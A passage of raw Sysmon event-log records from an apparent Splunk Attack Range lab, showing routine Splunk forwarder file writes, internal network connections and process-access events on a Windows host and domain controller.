Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0991DC57E169FC8C4348FFF58712CBE0,SHA256=0453CDD41F432261DB77B403BA2AE1D365111E76B8E7038D63BA0E4B17CA330D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:40.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727A31951A83FAE4F92059CA6CA79EB2,SHA256=C944C148ADB5EC10F2E60F6CB23345D5D04E9CBF1D98CE6FED2459C499CCDF09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:40.446{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:40.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3698D431B90E46C5EAF52A6A0367FAE,SHA256=8C3F571A81C094184138281401ECB45F928EB330C11F0C4FA836624DF36B5EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:41.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05FC26BCE62097F69269C9A44D47054D,SHA256=9DE996F47C5888D4CEA03664326E3513F6414DFDB0C1EA7004AEEA2B432A876F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:41.080{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D2E48BEC2CE6BCCB472E7D26875826,SHA256=6D10C00C870855F2FFA8071BA5D949474B4A029F8D1D5A32C6137A7054615A8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:39.541{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51645-false10.0.1.12-8000- 23542300x8000000000000000221331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:42.648{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC14CBEC7D0D50394AA3287783B8E06,SHA256=1F14519120EC335F259EFADA96E95FFC87DC0BAA2F84FA29008DCE7E5DE56781,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:39.904{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49455-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000297538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:42.098{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EAF23A1CBD726CC460D8DBBA3DB6B08,SHA256=FFDE7400C20317AB00A5763915347C5C64BD91FA7989515D0EAF090EFE1B756D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:43.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D9FE94A0CD721A713E34EB5C71F608,SHA256=5388328ECA6705CD7579F1BAD1D1E287116D13B9C4BC071D366048EE1430F1E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:41.730{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49456-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:43.102{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2018A9AFC40AAF8DDC760C9408B1041F,SHA256=33F0463B663BA231DE574B9F59A96741FC606E2D49197B321D1F042C5FDC4F4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.977{4F8D34B0-179C-6216-1005-000000003902}7082428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-179C-6216-1005-000000003902}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-179C-6216-1005-000000003902}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-179C-6216-1005-000000003902}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.806{4F8D34B0-179C-6216-1005-000000003902}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.696{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F603ECABC96163D6290FAC004E736E0,SHA256=41E774F88F3C368B07797C4701A9D6B91639D7D490056D35C2632F3D4E5D0D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:44.106{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=073E92352F64EBFAB19A53196E2818BE,SHA256=FB5D30B2A0AEF16B8C76D3196C1F79914ED3F487D57E293972443729BFE2F0CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-179C-6216-0F05-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 